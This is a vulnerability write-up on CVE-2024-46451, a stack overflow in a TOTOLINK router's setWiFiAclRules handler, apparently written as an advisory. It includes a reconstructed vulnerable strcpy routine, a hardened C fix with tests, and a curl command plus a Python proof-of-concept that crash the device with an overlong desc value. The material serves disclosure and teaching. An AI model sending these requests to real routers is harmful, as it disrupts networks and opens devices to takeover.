CVE-2024-46451 is a buffer overflow vulnerability, disclosed in September 2024, in the TOTOLINK AC120 T8 router running firmware v4.1.5cu.861_B20230220. The flaw lives in the setWiFiAclRules function, which copies the desc parameter into a fixed-size buffer without checking its length. An attacker on the local network, or a remote attacker if the administration interface is exposed to the Internet, can crash the device and potentially execute arbitrary code on it. In this article we break down what is happening, show how the bug is triggered, and discuss secure practices.

Where’s the Bug?

The setWiFiAclRules function is part of the web administration backend. Users set or change WiFi Access Control List (ACL) rules through a web form or an API call, and one of the parameters, desc, is a free-text description of the rule. The handler does not check the length of desc before copying it into a fixed-size stack buffer, so an overlong value overwrites whatever lies beyond that buffer.

The Problematic Code

TOTOLINK has not published source code, but reverse engineering the binary points to logic equivalent to the following. This is a simplified reconstruction, not the vendor's code:

#include <string.h>

/* Simplified reconstruction of the vulnerable handler */
void setWiFiAclRules(const char *desc /* attacker-controlled request parameter */) {
    char buf[128];               /* fixed-size stack buffer */
    /* INSECURE: strcpy copies until the NUL in desc, ignoring sizeof(buf) */
    strcpy(buf, desc);
    /* ... rest of the function uses buf ... */
}

Because strcpy also writes the terminating NUL, a desc of 128 bytes or more already spills past the buffer (127 characters plus the terminator is the most that fits). Whatever sits above buf on the stack, including the saved return address, gets overwritten, which leads to a crash or, with a carefully built payload, to arbitrary code execution.
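To make the fix concrete, here is an added example (my code, not TOTOLINK's firmware and not from the original article) that puts the strcpy pattern next to a hardened replacement and also shows why swapping in strncpy alone is not a fix. The 128-byte buffer size comes from the reconstruction above; the function names, the printable-character rule for descriptions, and the test inputs are my assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ACL_DESC_BUF 128  /* assumed: matches the 128-byte stack buffer above */

/* Vulnerable pattern, kept for contrast: strcpy stops only at the NUL in desc,
 * so any desc of ACL_DESC_BUF bytes or more writes past buf. */
static void acl_desc_copy_vulnerable(char *buf, const char *desc) {
    strcpy(buf, desc);
}

/* strncpy alone bounds the write but does not guarantee a terminating NUL when
 * desc is at least buf_len bytes long; later reads of buf (printf, strlen, a
 * second strcpy) then run off the end. Returns 1 if buf ends up terminated. */
static int acl_desc_copy_strncpy_only(char *buf, size_t buf_len, const char *desc) {
    strncpy(buf, desc, buf_len);
    return memchr(buf, '\0', buf_len) != NULL;
}

/* Hardened version: validate before copying. Returns 0 on success, -1 when desc
 * (with its NUL) would not fit or contains bytes that do not belong in a
 * human-readable description. Never scans desc beyond buf_len bytes. */
static int acl_desc_copy_safe(char *buf, size_t buf_len, const char *desc) {
    if (buf == NULL || desc == NULL || buf_len == 0) return -1;
    size_t n = 0;
    while (n < buf_len && desc[n] != '\0') n++;
    if (n >= buf_len) return -1;            /* 127 chars + NUL is the maximum */
    for (size_t i = 0; i < n; i++) {
        if (!isprint((unsigned char)desc[i])) return -1;  /* reject control bytes */
    }
    memcpy(buf, desc, n + 1);               /* n + 1 copies the terminator too */
    return 0;
}

/* Constructed test input: len 'A's followed by a NUL (out must hold len + 1). */
static void make_desc(char *out, size_t len) {
    memset(out, 'A', len);
    out[len] = '\0';
}

/* Does an arbitrary desc pass the hardened check? 1 = accepted, 0 = rejected. */
static int desc_accepted(const char *desc) {
    char buf[ACL_DESC_BUF];
    return acl_desc_copy_safe(buf, sizeof buf, desc) == 0;
}

/* Does a desc of 'len' printable characters pass the hardened check? */
static int desc_len_accepted(size_t len) {
    char desc[512];
    if (len >= sizeof desc) return 0;
    make_desc(desc, len);
    return desc_accepted(desc);
}

/* After strncpy of a desc of 'len' characters, is the 128-byte buffer terminated? */
static int strncpy_leaves_terminated(size_t len) {
    char buf[ACL_DESC_BUF];
    char desc[512];
    if (len >= sizeof desc) return 0;
    make_desc(desc, len);
    return acl_desc_copy_strncpy_only(buf, sizeof buf, desc);
}

int main(void) {
    char buf[ACL_DESC_BUF];
    acl_desc_copy_vulnerable(buf, "guest-wifi");   /* only safe because input is short */
    printf("127 chars accepted by safe copy: %d\n", desc_len_accepted(127));
    printf("128 chars accepted by safe copy: %d\n", desc_len_accepted(128));
    printf("256 chars accepted by safe copy: %d\n", desc_len_accepted(256));
    printf("strncpy terminated after 127 chars: %d\n", strncpy_leaves_terminated(127));
    printf("strncpy terminated after 128 chars: %d\n", strncpy_leaves_terminated(128));
    return 0;
}
```

The boundary the article's 256-byte payload crosses is visible at 128: the safe copy refuses exactly the input that strcpy would overflow, and the strncpy variant shows the classic follow-on bug where the buffer is filled but left without a terminator.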

How the Exploit Works

Step 1: Authenticate (if needed)

The endpoint sits behind the web admin interface, so log in with valid credentials first. Depending on the firmware build, the session may be tracked with a cookie or with HTTP Basic auth; capture whichever token is issued for use in the next step.

Step 2: Send the Malicious Payload

The bug can be triggered with a tool as simple as curl. The following request sends an overlong desc parameter (replace <router_ip> with the router's LAN address):

curl -X POST "http://<router_ip>/cgi-bin/cstecgi.cgi" \
  -d "func=setWiFiAclRules" \
  -d "desc=$(python3 -c 'print("A"*256)')" \
  --cookie "SESSION_ID=<your_session_id>"

The router may crash, reboot, or start behaving erratically; often the HTTP request simply never completes because the web server process has died.

With more effort, an attacker can craft the overflow precisely instead of filling it with A's, redirecting execution to code of their choosing, for example to spawn a remote shell.

The same request as a Python proof-of-concept:

import requests

target_url = 'http://<router_ip>/cgi-bin/cstecgi.cgi'  # replace with the router's LAN address
payload = 'A' * 256  # 256 bytes, double the 128-byte buffer
data = {
    'func': 'setWiFiAclRules',
    'desc': payload,
}
cookies = {'SESSION_ID': 'your_session_cookie'}  # from an authenticated admin session

try:
    # A timeout matters here: if the overflow kills the web server the request
    # never completes, and the resulting exception is itself the signal.
    response = requests.post(target_url, data=data, cookies=cookies, timeout=10)
    print('Status:', response.status_code)
    print('Response:', response.text)
except requests.exceptions.RequestException as exc:
    print('No valid HTTP response (device may have crashed):', exc)

Potential Impact

- Crash (Denial of Service): The most likely outcome is a router crash or reboot, a boot loop, or, in the worst case, a bricked device.
- Remote Code Execution: With a specially crafted payload, an attacker may run arbitrary commands and take over the router.
- Network Compromise: Routers mediate all LAN/WAN traffic, so a compromised router exposes internal devices, allows credential theft, and enables man-in-the-middle attacks.

Mitigation

- Update Firmware: Check TOTOLINK's support site for a release newer than v4.1.5cu.861_B20230220 and apply it.
- Restrict Admin Access: Never expose the router's web admin interface to the Internet, and keep it reachable only from a separate, trusted management network.

References

- CVE Details listing for CVE-2024-46451
- TOTOLINK Security Bulletins
- Original vulnerability report (Packet Storm)
- Common buffer overflow exploitation techniques

Final Thoughts

This vulnerability reminds us that even “consumer-grade” routers must be treated as critical infrastructure. Attackers don’t always need to be hackers-in-the-basement; automated malware, botnets, or rogue insiders can leverage flaws like CVE-2024-46451 with little effort.

If you have a TOTOLINK AC120 T8 (v4.1.5cu.861_B20230220) in your network, check for updates, restrict access to the admin interface, and consider replacing the device if no fixed firmware is available. For researchers, this bug is a textbook example of why secure coding and input validation matter at every level of device development.

Timeline

Published on: 09/16/2024 13:15:10 UTC
Last modified on: 09/17/2024 14:35:31 UTC